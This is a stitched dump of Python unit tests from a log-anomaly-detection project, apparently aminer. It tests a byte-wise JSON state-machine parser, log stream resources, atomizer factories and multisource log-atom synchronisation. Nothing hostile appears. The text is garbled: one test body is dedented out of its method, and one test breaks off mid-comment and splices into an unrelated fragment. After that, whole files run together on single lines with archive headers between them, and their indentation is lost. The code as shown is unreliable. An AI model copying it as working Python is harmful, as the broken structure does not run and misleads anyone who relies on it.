    string = b"This is a foreign letter: \xe0\xa0\xab"
    state = string_machine(check_value)
    utf8_machine_found = False
    for c in string:
        state = state(c)
        if state.__name__ == '_utf8':
            utf8_machine_found = True
    self.assertIsNone(state(ord(b'"')))
    self.assertTrue(utf8_machine_found)
    string = b"This is an egyptian hieroglyph: \xf0\x93\x80\x90"
    state = string_machine(check_value)
    utf8_machine_found = False
    for c in string:
        state = state(c)
        if state.__name__ == '_utf8':
            utf8_machine_found = True
    self.assertIsNone(state(ord(b'"')))
# Last assertion of test12utf8_machine_started_from_string_machine (the 4 byte case);
# the rest of that method is on the previous chunk line.
self.assertTrue(utf8_machine_found)

def test13string_machine_valid_values(self):
    """Test the string_machine with all valid characters.

    allowed_chars is a raw LF followed by every byte 0x20-0x7F except '"' and
    '\\'. The machine must stay in state '_string' for each of them and finish
    (None) on the closing quote, delivering the decoded str to check_value.

    NOTE(review): a raw newline (0x0A) inside a string value is accepted here and
    deliberately skipped in test14. RFC 8259 requires control characters to be
    escaped; accepting a bare LF means a JSON string value can span physical
    lines, which matters for log data where a newline normally ends a record.
    Confirm this leniency is intended for the atomizer's json_format mode.
    """
    def check_value(data):  # skipcq: PY-D0003
        self.assertEqual(data, allowed_chars)
    allowed_chars = "\n"
    for c in range(0x20, 0x80):
        if c in (0x22, 0x5c):  # skip "\
            continue
        allowed_chars += chr(c)
    state = string_machine(check_value)
    for c in allowed_chars.encode():
        state = state(c)
        self.assertEqual(state.__name__, "_string")
    state = state(ord('"'))
    self.assertIsNone(state)

def test14string_machine_invalid_values(self):
    """Test the string_machine with some invalid values.

    Every C0 control byte except LF (see test13) and every bare continuation
    byte 0x80-0xBF must end the machine on the first byte. Lead bytes 0xC0-0xFF
    are not covered here; they start the utf8 sub-machine (test12).
    """
    def raise_error(_):  # skipcq: PY-D0003
        raise Exception("Invalid returned as valid.")
    for c in range(0x20):  # ascii control characters
        if c == 0xa:
            continue
        state = string_machine(raise_error)
        self.assertIsNone(state(c))
    for c in range(0x80, 0xc0):  # some characters after the ascii table
        state = string_machine(raise_error)
        self.assertIsNone(state(c))

def test15string_machine_escaped_strings(self):
    """Test all allowed escape strings in the string_machine.

    Each escape is fed as backslash (0x5c) followed by the escape letter. Only
    \\b, \\f, \\", \\\\ and \\/ are exercised; \\n, \\r and \\t are not covered by any
    test in this file and \\u is covered in test5, so "all" overstates slightly.
    """
    def check_value(data):  # skipcq: PY-D0003
        self.assertEqual(data, compare_strings)
    escape_strings = b"bf\"\\/"
    compare_strings = "\b\f\"\\/"
    state = string_machine(check_value)
    for c in escape_strings:
        state = state(0x5c)  # \
        state = state(c)
    state = state(0x22)  # "
    self.assertIsNone(state)

def test16constant_machine_valid_values(self):
    """Test all allowed values for the constant_machine.
    The first letter was already handled by the json_machine.

    constant_machine(remaining_bytes, python_value, callback): after the
    remaining bytes of true/false/null it returns None and hands python_value
    to the callback (value is rebound before each case for the comparison).
    """
    def check_value(data):  # skipcq: PY-D0003
        self.assertEqual(data, value)
    TRUE = [0x72, 0x75, 0x65]
    FALSE = [0x61, 0x6c, 0x73, 0x65]
    NULL = [0x75, 0x6c, 0x6c]
    value = True
    state = constant_machine(TRUE, True, check_value)
    for t in TRUE:
        state = state(t)
    self.assertIsNone(state)
    value = False
    state = constant_machine(FALSE, False, check_value)
    for f in FALSE:
        state = state(f)
    self.assertIsNone(state)
    value = None
    state = constant_machine(NULL, None, check_value)
    for n in NULL:
        state = state(n)
    self.assertIsNone(state)

def test17constant_machine_invalid_values(self):
    """Test if constant_machine fails. The first letter was already handled by the json_machine.

    Only the first mismatching byte is fed (upper case, or 'o' of "none" for
    null): the machine must return None there, without calling the callback.
    """
    def raise_error(_):  # skipcq: PY-D0003
        raise Exception("Invalid returned as valid.")
    TRUE = [0x72, 0x75, 0x65]
    TRUE_UPPER = [0x52, 0x55, 0x45]
    FALSE = [0x61, 0x6c, 0x73, 0x65]
    FALSE_UPPER = [0x41, 0x4c, 0x53, 0x45]
    NULL = [0x75, 0x6c, 0x6c]
    NULL_UPPER = [0x55, 0x4c, 0x4c]
    NONE = [0x6f, 0x6e, 0x65]
    state = constant_machine(TRUE, True, raise_error)
    self.assertIsNone(state(TRUE_UPPER[0]))
    state = constant_machine(FALSE, False, raise_error)
    self.assertIsNone(state(FALSE_UPPER[0]))
    state = constant_machine(NULL, None, raise_error)
    self.assertIsNone(state(NULL_UPPER[0]))
    state = constant_machine(NULL, None, raise_error)
    self.assertIsNone(state(NONE[0]))

def test18constant_machine_started_from_json_machine(self):
    """Test if the constant_machine is started from the json_machine.
    Due to changes in the json_machine all values must be objects.

    The constant is wrapped as {"var": <constant>}; after the closing brace the
    json_machine is back in its '_value' state, ready for the next object.
    """
    def check_value(data):  # skipcq: PY-D0003
        self.assertEqual(data, {'var': value})
    OBJECT_PREFIX = [0x7b, 0x22, 0x76, 0x61, 0x72, 0x22, 0x3a, 0x20]  # {"var":
    TRUE = [0x74, 0x72, 0x75, 0x65]
    FALSE = [0x66, 0x61, 0x6c, 0x73, 0x65]
    NULL = [0x6e, 0x75, 0x6c, 0x6c]
    value = True
    state = json_machine(check_value)
    for t in OBJECT_PREFIX + TRUE:
        state = state(t)
    self.assertEqual(state(ord('}')).__name__, '_value')
    value = False
    state = json_machine(check_value)
    for f in OBJECT_PREFIX + FALSE:
        state = state(f)
    self.assertEqual(state(ord('}')).__name__, '_value')
    value = None
    state = json_machine(check_value)
    for n in OBJECT_PREFIX + NULL:
        state = state(n)
    self.assertEqual(state(ord('}')).__name__, '_value')

def check_number_machine(self, check_int_value, value, end_sign):  # skipcq: PY-D0003
    """Feed value to a number_machine and assert the terminator ends it.

    number_machine takes the first byte at construction; the remaining bytes
    are fed one by one and end_sign (a non-numeric byte) must make it return
    None. The callback receives (parsed number, terminating byte).
    """
    state = number_machine(value[0], check_int_value)
    for c in value[1:]:
        state = state(c)
    self.assertIsNone(state(end_sign))

def test19number_machine_valid_values(self):
    """Test valid values in the number_machine.

    Floats are compared after round(..., 10) to absorb parse-time rounding.
    Note that b'+222' is accepted: RFC 8259 grammar has no leading '+', so this
    documents a deliberate leniency of number_machine.
    """
    def check_int_value(data, byte_data):  # skipcq: PY-D0003
        self.assertEqual(data, int(value))
        self.assertEqual(end_sign, byte_data)
    def check_float_value(data, byte_data):  # skipcq: PY-D0003
        self.assertEqual(round(data, 10), float(value))
        self.assertEqual(end_sign, byte_data)
    end_sign = ord(',')
    value = b'222'
    self.check_number_machine(check_int_value, value, end_sign)
    value = b'9223372036854775808'  # maxsize 2^64  (actually 2**63; one above the signed 64-bit maximum)
    self.check_number_machine(check_int_value, value, end_sign)
    value = b'-222'
    self.check_number_machine(check_int_value, value, end_sign)
    value = b'+222'
    self.check_number_machine(check_int_value, value, end_sign)
    value = b'21.50'
    self.check_number_machine(check_float_value, value, end_sign)
    value = b'21.05'
    self.check_number_machine(check_float_value, value, end_sign)
    value = b'-21.05'
    self.check_number_machine(check_float_value, value, end_sign)
    value = b'1.56E-5'
    self.check_number_machine(check_float_value,
                              value, end_sign)
    value = b'1.56e-5'
    self.check_number_machine(check_float_value, value, end_sign)

def test20number_machine_end_signs(self):
    """Check if all non numerical signs end the number_machine.

    After b'222', every byte in end_signs must return None; '.', 'E', 'e' and
    '0'-'8' must keep the machine alive. Coverage gap: 0x2f ('/') and 0x39
    ('9') are in neither list.
    """
    def check_int_value(data, byte_data):  # skipcq: PY-D0003
        self.assertEqual(data, int(value))
        self.assertEqual(end_sign, byte_data)
    value = b'222'
    end_signs = list(range(0x2e)) + list(range(0x3a, 0x45)) + list(range(0x46, 0x65)) + list(range(0x66, 0x80))
    valid_signs = [0x2e, 0x45, 0x65] + list(range(0x30, 0x39))
    for end_sign in end_signs:
        state = number_machine(value[0], check_int_value)
        for c in value[1:]:
            state = state(c)
        self.assertIsNone(state(end_sign))
    for end_sign in valid_signs:
        state = number_machine(value[0], check_int_value)
        for c in value[1:]:
            state = state(c)
        self.assertIsNotNone(state(end_sign))

def test21number_machine_invalid_values(self):
    """Test invalid values in the number_machine.

    Each sample is fed only up to the first byte that must end the machine; the
    callback would raise if anything were reported. NaN, Infinity and '.1' fail
    on the constructor byte itself. Leading zeros ('0222', '-0222') and '0x'
    are rejected, matching the JSON grammar.
    """
    def raise_error(_data, _byte_data):  # skipcq: PY-D0003
        raise Exception("Invalid number treated as valid!")
    value = b'- 222'
    state = number_machine(value[0], raise_error)
    self.assertIsNone(state(value[1]))
    # octal number
    value = b'0222'
    self.assertIsNone(number_machine(value[0], raise_error)(value[1]))
    # negative octal number
    value = b'-0222'
    self.assertIsNone(number_machine(value[0], raise_error)(value[1])(value[2]))
    # hex number
    value = b'0x80'
    self.assertIsNone(number_machine(value[0], raise_error)(value[1]))
    value = b'NaN'
    self.assertIsNone(number_machine(value[0], raise_error))
    value = b'Infinity'
    self.assertIsNone(number_machine(value[0], raise_error))
    value = b'.1'
    self.assertIsNone(number_machine(value[0], raise_error))

def check_number_machine_from_json_machine(self, check_int_value, value, end_sign):  # skipcq: PY-D0003
    """Feed a whole {"value": <number>} prefix through json_machine.

    end_sign is the closing '}' here; after it the json_machine must be back
    in its '_value' state and the callback has received the complete object.
    """
    state = json_machine(check_int_value)
    for c in value:
        state = state(c)
    self.assertEqual(state(end_sign).__name__, '_value')

def test22number_machine_started_from_json_machine(self):
    """Test if the number_machine is started from the
    json_machine."""
# Body of test22number_machine_started_from_json_machine; its def line and the
# opening of its docstring are on the previous chunk line. Same samples as test19
# plus 0, 0.56 and positive exponents, now wrapped in {"value": ...}.
def check_int_value(data):  # skipcq: PY-D0003
    self.assertEqual(data, {'value': int(value)})
def check_float_value(data):  # skipcq: PY-D0003
    # rounds the parsed float in place before comparing the whole object.
    data['value'] = round(data['value'], 10)
    self.assertEqual(data, {'value': float(value)})
end_sign = ord('}')
object_prefix = b'{"value": '
value = b'222'
self.check_number_machine_from_json_machine(check_int_value, object_prefix+value, end_sign)
value = b'9223372036854775808'  # maxsize 2^64  (actually 2**63)
self.check_number_machine_from_json_machine(check_int_value, object_prefix+value, end_sign)
value = b'-222'
self.check_number_machine_from_json_machine(check_int_value, object_prefix+value, end_sign)
value = b'+222'  # leading '+' is not JSON grammar; accepted by number_machine (cf. test19)
self.check_number_machine_from_json_machine(check_int_value, object_prefix+value, end_sign)
value = b'0'  # checked via the float callback: 0 == 0.0
self.check_number_machine_from_json_machine(check_float_value, object_prefix+value, end_sign)
value = b'21.50'
self.check_number_machine_from_json_machine(check_float_value, object_prefix+value, end_sign)
value = b'21.05'
self.check_number_machine_from_json_machine(check_float_value, object_prefix+value, end_sign)
value = b'-21.05'
self.check_number_machine_from_json_machine(check_float_value, object_prefix+value, end_sign)
value = b'0.56'
self.check_number_machine_from_json_machine(check_float_value, object_prefix+value, end_sign)
value = b'1.56E-5'
self.check_number_machine_from_json_machine(check_float_value, object_prefix+value, end_sign)
value = b'1.56e-5'
self.check_number_machine_from_json_machine(check_float_value, object_prefix+value, end_sign)
value = b'1.56e+5'
self.check_number_machine_from_json_machine(check_float_value, object_prefix+value, end_sign)
value = b'0.56e+5'
self.check_number_machine_from_json_machine(check_float_value, object_prefix+value, end_sign)

def test23array_machine_valid_array(self):
    """Test possible valid arrays.

    array_machine is started after the opening '[' has been consumed, so the
    samples begin with the first element and end with ']'. It must return None
    on ']' and deliver the Python list (22.50 -> 22.5) to check_value.
    """
    def check_value(data):  # skipcq: PY-D0003
        self.assertEqual(data, compare_value)
    value = b'"string", 22, 22.50, true, false, null]'
    compare_value = ['string', 22,
                     22.5, True, False, None]
    state = array_machine(check_value)
    for c in value:
        state = state(c)
    self.assertIsNone(state)
    # same elements with newline/tab whitespace.
    value = b'\n\t\t"string",\n\t\t22,\n\t\t22.50,\n\t\ttrue,\n\t\tfalse,\n\t\tnull]'
    state = array_machine(check_value)
    for c in value:
        state = state(c)
    self.assertIsNone(state)
    value = b'{"value": 22}, {"value": "string"}]'
    compare_value = [{'value': 22}, {'value': 'string'}]
    state = array_machine(check_value)
    for c in value:
        state = state(c)
    self.assertIsNone(state)

def test24array_machine_invalid_formats(self):
    """Test the array_machine with invalid formats.

    Only the bytes up to and including the first offending one are fed (a
    missing comma, a ':' where an element is expected): the machine is expected
    to return None there, and calling None afterwards would raise TypeError.
    """
    def raise_error(_):  # skipcq: PY-D0003
        raise Exception("Invalid returned as valid.")
    value = b'"string" 22, 22.50, true, false, null]'
    state = array_machine(raise_error)
    for c in value[:value.index(b'2') + 1]:
        state = state(c)
    self.assertIsNone(state)
    value = b'"key": {"value": 2}]'
    state = array_machine(raise_error)
    for c in value[:value.index(b':') + 1]:
        state = state(c)
    self.assertIsNone(state)

def test25array_machine_started_from_json_machine(self):
    """Test if the array_machine is started from the json_machine.

    The arrays of test23 wrapped in an object; after the closing '}' the
    json_machine is back in its '_value' state.
    """
    def check_value(data):  # skipcq: PY-D0003
        self.assertEqual(data, compare_value)
    value = b'{"values_array": ["string", 22, 22.50, true, false, null]}'
    compare_value = {'values_array': ['string', 22, 22.5, True, False, None]}
    state = json_machine(check_value)
    for c in value:
        state = state(c)
    self.assertEqual(state.__name__, '_value')
    value = b'{"values_array": [\n\t\t"string",\n\t\t22,\n\t\t22.50,\n\t\ttrue,\n\t\tfalse,\n\t\tnull]}'
    state = json_machine(check_value)
    for c in value:
        state = state(c)
    self.assertEqual(state.__name__, '_value')
    value = b'{"objects_array": [{"value": 22}, {"value": "string"}]}'
    compare_value = {'objects_array': [{'value': 22}, {'value': 'string'}]}
    state = json_machine(check_value)
    for c in value:
        state = state(c)
    self.assertEqual(state.__name__, '_value')

def test26object_machine_valid_objects(self):
    """Check if the object_machine can handle different
    valid formats.

    object_machine is started after the opening '{'; the samples therefore
    start at the first key and end with '}'. All three whitespace variants must
    produce the same dict.
    """
    def check_value(data):  # skipcq: PY-D0003
        self.assertEqual(data, compare_value)
    # single line, no spaces
    value = b'"string":"Hello World","integer":22,"float":22.23,"bool":true,"array":["Hello","World"]}'
    compare_value = {'string': 'Hello World', 'integer': 22, 'float': 22.23, 'bool': True, 'array': ['Hello', 'World']}
    state = object_machine(check_value)
    for c in value:
        state = state(c)
    self.assertIsNone(state)
    # single line with spaces
    value = b'"string": "Hello World", "integer": 22, "float": 22.23, "bool": true, "array": ["Hello", "World"]}'
    state = object_machine(check_value)
    for c in value:
        state = state(c)
    self.assertIsNone(state)
    # multiline with tabs
    value = b'\n\t"string": "Hello World",\n\t"integer": 22,\n\t"float": 22.23,\n\t"bool": true,\n\t"array": [' \
        b'\n\t\t"Hello",\n\t\t"World"]}'
    state = object_machine(check_value)
    for c in value:
        state = state(c)
    self.assertIsNone(state)

def test27object_machine_invalid_values(self):
    """Test the object_machine with invalid values.

    As in test24 the input is fed only up to the first byte at which the
    machine must give up (None); raise_error would fire if an object were
    reported anyway.
    """
    def raise_error(_):  # skipcq: PY-D0003
        raise Exception("Invalid returned as valid.")
    # keys without "
    value = b'"string":"Hello World",integer:22,"float":22.23,"bool":true,"array":["Hello","World"]}'
    state = object_machine(raise_error)
    for c in value[:value.index(b'integer') + 1]:
        state = state(c)
    self.assertIsNone(state)
    # = instead of :
    value = b'"string":"Hello World","integer"=22,"float":22.23,"bool":true,"array":["Hello","World"]}'
    state = object_machine(raise_error)
    for c in value[:value.index(b'=') + 1]:
        state = state(c)
    self.assertIsNone(state)
    # no comma after attribute. The error is only found after the next :. However this behavior is not problematic, because another
    # attribute or the end bracket } has to follow.
0x31, 0x5b, 0x74, 0x66, 0x6e] for value in forbidden_values: state = json_machine(raise_error) self.assertIsNone(state(value)) state = json_machine(raise_error) self.assertIsNotNone(state(ord('{'))) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/input/LogStreamTest.py000066400000000000000000000162121437606560100262340ustar00rootroot00000000000000import unittest from aminer.input.LogStream import FileLogDataResource, UnixSocketLogDataResource, LogStream import os import base64 import socket import hashlib # skipcq: BAN-B404 import subprocess from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler from aminer.input.ByteStreamLineAtomizer import ByteStreamLineAtomizer from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from unit.TestBase import TestBase class LogStreamTest(TestBase): """Unittests for the LogStream.""" logfile = b'/tmp/log.txt' file = b'file://' def setUp(self): """Set up the logfile.""" super().setUp() with open(self.logfile, "w+") as f: for i in range(150): f.write("%d %s\r\n" % (i + 1, "d" * 1000)) def tearDown(self): """Remove the logfile.""" super().tearDown() os.remove(self.logfile) def test1file_log_data_resource_no_file(self): """In this case the log_resource_name does not start with b'file://'.""" self.assertRaises(Exception, FileLogDataResource, b'/var/log/syslog', -1) def test2file_log_data_resource_log_stream_closed_no_repositioning(self): """ In this case the log_stream_fd is -1 and repositioning_data is None. The next step is to open the stream successfully. Afterwards the buffer object is filled with data and the position is updated. 
""" file_log_data_resource = FileLogDataResource(self.file + self.logfile, -1) file_log_data_resource.open(False) self.assertEqual(file_log_data_resource.buffer, b'') length = file_log_data_resource.fill_buffer() self.assertEqual(length, file_log_data_resource.default_buffer_size) file_log_data_resource.update_position(length) self.assertEqual(file_log_data_resource.buffer, b'') self.assertEqual(file_log_data_resource.total_consumed_length, file_log_data_resource.default_buffer_size) # repeat to see if totalConsumedLength was changed. length = file_log_data_resource.fill_buffer() self.assertEqual(length, file_log_data_resource.default_buffer_size) file_log_data_resource.update_position(length) self.assertEqual(file_log_data_resource.buffer, b'') self.assertEqual(file_log_data_resource.total_consumed_length, 2 * file_log_data_resource.default_buffer_size) file_log_data_resource.close() def test3file_log_data_resource_log_stream_already_open_repositioning(self): """ In this case the logStreamFd is > 0 and repositioningData is not None. The stream should be repositioned to the right position. """ fd = os.open('/tmp/log.txt', os.O_RDONLY) # skipcq: BAN-B108 length = 65536 data = os.read(fd, length) # skipcq: BAN-B324, PTC-W1003 md5 = hashlib.md5() md5.update(data) hash_digest = md5.digest() os.close(fd) fd = os.open('/tmp/log.txt', os.O_RDONLY) # skipcq: BAN-B108 file_log_data_resource = FileLogDataResource(self.file + self.logfile, fd, 65536, [os.fstat(fd).st_ino, length, base64.b64encode(hash_digest)]) file_log_data_resource.fill_buffer() self.assertTrue(not file_log_data_resource.buffer == data) os.close(fd) def test4unix_socket_log_data_resource_no_unix_socket(self): """In this case the log_resource_name does not start with b'unix://'.""" self.assertRaises(Exception, UnixSocketLogDataResource, b'/tmp/log', -1) def test5unix_socket_log_data_resource(self): """ In this case the log_stream_fd is -1. The next step is to open the stream successfully. 
Therefor a server socket is set up listen to data to the server. Afterwards the buffer object is filled with data and the position is updated. """ sockName = b'/tmp/test5unixSocket.sock' # skipcq: BAN-B607, BAN-B603 proc = subprocess.Popen(['python3', 'unit/input/client.py']) if os.path.exists(sockName): os.remove(sockName) print("Opening socket...") server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) server.bind(sockName) server.listen(1) connection = server.accept()[0] unix_socket_log_data_resource = UnixSocketLogDataResource(b'unix://' + sockName, connection.fileno()) print("Listening...") unix_socket_log_data_resource.fill_buffer() self.assertEqual(repr(unix_socket_log_data_resource.buffer), repr(b'data')) print('Data received: %s' % unix_socket_log_data_resource.buffer.decode()) unix_socket_log_data_resource.update_position(len(unix_socket_log_data_resource.buffer)) self.assertEqual(unix_socket_log_data_resource.total_consumed_length, 4) self.assertEqual(unix_socket_log_data_resource.buffer, b'') print("Shutting down...") unix_socket_log_data_resource.close() server.close() proc.terminate() proc.wait() print("Done") def test6_log_stream_handle_streams(self): """ This unit case verifies the functionality of the LogStream class. Different FileLogDataResources are added to the stream. The handling of not existing sources is also tested. 
""" stream_printer_event_handler = StreamPrinterEventHandler(self.analysis_context, self.output_stream) any_byte_data_me = AnyByteDataModelElement('a1') byte_stream_line_atomizer = ByteStreamLineAtomizer(any_byte_data_me, [], [stream_printer_event_handler], 300, []) file_log_data_resource = FileLogDataResource(self.file + self.logfile, -1) self.assertEqual(file_log_data_resource.buffer, b'') log_stream = LogStream(file_log_data_resource, byte_stream_line_atomizer) file_log_data_resource.open(False) log_stream.handle_stream() self.assertEqual(file_log_data_resource.total_consumed_length + len(file_log_data_resource.buffer), file_log_data_resource.default_buffer_size) log_stream.handle_stream() self.assertEqual(file_log_data_resource.total_consumed_length + len(file_log_data_resource.buffer), file_log_data_resource.default_buffer_size) fileLogDataResource2 = FileLogDataResource(b'file:///var/log/auth.log', -1) self.assertEqual(fileLogDataResource2.buffer, b'') fileLogDataResource2.open(False) log_stream.add_next_resource(fileLogDataResource2) log_stream.roll_over() log_stream.handle_stream() self.assertTrue(file_log_data_resource.total_consumed_length > 0) self.assertEqual(file_log_data_resource.total_consumed_length, file_log_data_resource.default_buffer_size) self.assertTrue(fileLogDataResource2.total_consumed_length > 0) log_stream.roll_over() fileLogDataResource3 = FileLogDataResource(b'file:///var/log/123example.log', -1) fileLogDataResource3.open(False) log_stream.add_next_resource(fileLogDataResource3) self.assertRaises(OSError, log_stream.roll_over) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/input/SimpleByteStreamLineAtomizerFactoryTest.py000066400000000000000000000033131437606560100334410ustar00rootroot00000000000000import unittest from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from 
aminer.analysis.NewMatchPathDetector import NewMatchPathDetector from unit.TestBase import TestBase class SimpleByteStreamLineAtomizerFactoryTest(TestBase): """The SimpleByteStreamLineAtomizerFactory should return a valid ByteStreamLineAtomizer with all parameters of the Factory.""" def test1get_atomizer(self): """Tests the creating of an SimpleByteStreamLineAtomizer with the Factory.""" any_byte_data_model_element = AnyByteDataModelElement('a1') new_match_path_detector1 = NewMatchPathDetector(self.aminer_config, [], 'Default', False) new_match_path_detector2 = NewMatchPathDetector(self.aminer_config, [], 'Default', False) simple_byte_stream_line_atomizer_factory = SimpleByteStreamLineAtomizerFactory(any_byte_data_model_element, [ new_match_path_detector1, new_match_path_detector2], [self.stream_printer_event_handler], None) byte_stream_line_atomizer = simple_byte_stream_line_atomizer_factory.get_atomizer_for_resource(None) self.assertEqual(byte_stream_line_atomizer.atom_handler_list, [new_match_path_detector1, new_match_path_detector2]) self.assertEqual(byte_stream_line_atomizer.event_handler_list, [self.stream_printer_event_handler]) self.assertEqual(byte_stream_line_atomizer.default_timestamp_path_list, []) self.assertEqual(byte_stream_line_atomizer.parsing_model, any_byte_data_model_element) self.assertEqual(byte_stream_line_atomizer.max_line_length, 65536) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/input/SimpleMultisourceAtomSyncTest.py000066400000000000000000000245501437606560100315060ustar00rootroot00000000000000import unittest from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector from aminer.input.SimpleMultisourceAtomSync import SimpleMultisourceAtomSync from aminer.parsing.MatchContext import MatchContext from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from time import time, 
sleep from unit.TestBase import TestBase from datetime import datetime class SimpleMultisourceAtomSyncTest(TestBase): """Unittests for the SimpleMultisourceAtomSync.""" __expected_string = '%s New path(es) detected\n%s: "%s" (%d lines)\n %s\n%s\n\n' calculation = b'256 * 2 = 512' datetime_format_string = '%Y-%m-%d %H:%M:%S' match_path = "['match/a1']" def test1sorted_log_atoms(self): """In this test case multiple, SORTED LogAtoms of different sources are received by the class.""" description = "Test1SimpleMultisourceAtomSync" sync_wait_time = 3 any_byte_data_model_element = AnyByteDataModelElement('a1') new_match_path_detector1 = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False, output_logline=False) self.analysis_context.register_component(new_match_path_detector1, description) new_match_path_detector2 = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False, output_logline=False) self.analysis_context.register_component(new_match_path_detector2, description + "2") simple_multisource_atom_sync = SimpleMultisourceAtomSync([new_match_path_detector1, new_match_path_detector2], sync_wait_time) t = time() match_context = MatchContext(self.calculation) match_element = any_byte_data_model_element.get_match_element('match', match_context) log_atom1 = LogAtom(match_element.match_object, ParserMatch(match_element), t, new_match_path_detector1) log_atom2 = LogAtom(match_element.match_object, ParserMatch(match_element), t + 1, new_match_path_detector1) self.assertTrue(not simple_multisource_atom_sync.receive_atom(log_atom1)) sleep(sync_wait_time + 1) # not of the same source, thus must not be accepted. self.assertTrue(not simple_multisource_atom_sync.receive_atom(log_atom2)) self.assertTrue(simple_multisource_atom_sync.receive_atom(log_atom1)) # logAtom1 is handled now, so logAtom2 is accepted. 
self.reset_output_stream() self.assertTrue(simple_multisource_atom_sync.receive_atom(log_atom2)) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t + 1).strftime(self.datetime_format_string), new_match_path_detector1.__class__.__name__, description, 1, self.match_path, self.calculation.decode()) + self.__expected_string % ( datetime.fromtimestamp(t + 1).strftime(self.datetime_format_string), new_match_path_detector1.__class__.__name__, description + "2", 1, self.match_path, self.calculation.decode())) def test2no_timestamp_log_atom(self): """In this test case a LogAtom with no timestamp is received by the class.""" description = "Test2SimpleMultisourceAtomSync" sync_wait_time = 3 any_byte_data_model_element = AnyByteDataModelElement('a1') new_match_path_detector1 = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False, output_logline=False) self.analysis_context.register_component(new_match_path_detector1, description) simple_multisource_atom_sync = SimpleMultisourceAtomSync([new_match_path_detector1], sync_wait_time) t = time() match_context = MatchContext(self.calculation) match_element = any_byte_data_model_element.get_match_element('match', match_context) log_atom1 = LogAtom(match_element.match_object, ParserMatch(match_element), None, new_match_path_detector1) self.assertTrue(simple_multisource_atom_sync.receive_atom(log_atom1)) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t).strftime(self.datetime_format_string), new_match_path_detector1.__class__.__name__, description, 1, self.match_path, self.calculation.decode())) def test3unsorted_log_atom(self): """In this test case multiple, UNSORTED LogAtoms of different sources are received by the class.""" description = "Test3SimpleMultisourceAtomSync" sync_wait_time = 3 any_byte_data_model_element = AnyByteDataModelElement('a1') new_match_path_detector1 = 
NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False, output_logline=False) self.analysis_context.register_component(new_match_path_detector1, description) new_match_path_detector2 = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False, output_logline=False) self.analysis_context.register_component(new_match_path_detector2, description + "2") simple_multisource_atom_sync = SimpleMultisourceAtomSync([new_match_path_detector1, new_match_path_detector2], sync_wait_time) t = time() match_context = MatchContext(self.calculation) match_element = any_byte_data_model_element.get_match_element('match', match_context) log_atom1 = LogAtom(match_element.match_object, ParserMatch(match_element), t, new_match_path_detector1) log_atom2 = LogAtom(match_element.match_object, ParserMatch(match_element), t - 1, new_match_path_detector1) self.assertTrue(not simple_multisource_atom_sync.receive_atom(log_atom1)) sleep(sync_wait_time) # unsorted, should be accepted self.reset_output_stream() self.assertTrue(simple_multisource_atom_sync.receive_atom(log_atom2)) self.assertTrue(simple_multisource_atom_sync.receive_atom(log_atom1)) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t - 1).strftime(self.datetime_format_string), new_match_path_detector1.__class__.__name__, description, 1, self.match_path, self.calculation.decode()) + self.__expected_string % ( datetime.fromtimestamp(t - 1).strftime(self.datetime_format_string), new_match_path_detector1.__class__.__name__, description + "2", 1, self.match_path, self.calculation.decode()) + self.__expected_string % ( datetime.fromtimestamp(t).strftime(self.datetime_format_string), new_match_path_detector1.__class__.__name__, description, 1, self.match_path, self.calculation.decode()) + self.__expected_string % ( datetime.fromtimestamp(t).strftime(self.datetime_format_string), 
new_match_path_detector1.__class__.__name__, description + "2", 1, self.match_path, self.calculation.decode())) def test4has_idle_source(self): """In this test case a source becomes idle and expires.""" description = "Test4SimpleMultisourceAtomSync" sync_wait_time = 3 any_byte_data_model_element = AnyByteDataModelElement('a1') new_match_path_detector1 = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False, output_logline=False) self.analysis_context.register_component(new_match_path_detector1, description) new_match_path_detector2 = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False, output_logline=False) self.analysis_context.register_component(new_match_path_detector2, description + "2") simple_multisource_atom_sync = SimpleMultisourceAtomSync([new_match_path_detector1], sync_wait_time) t = time() match_context = MatchContext(self.calculation) match_element = any_byte_data_model_element.get_match_element('match', match_context) log_atom1 = LogAtom(match_element.match_object, ParserMatch(match_element), t, new_match_path_detector1) log_atom2 = LogAtom(match_element.match_object, ParserMatch(match_element), t, new_match_path_detector2) self.assertTrue(not simple_multisource_atom_sync.receive_atom(log_atom1)) self.assertTrue(not simple_multisource_atom_sync.receive_atom(log_atom2)) sleep(sync_wait_time + 1) self.assertTrue(simple_multisource_atom_sync.receive_atom(log_atom1)) # log_atom1 is handled now, so new_match_path_detector1 should be deleted after waiting the sync_wait_time. 
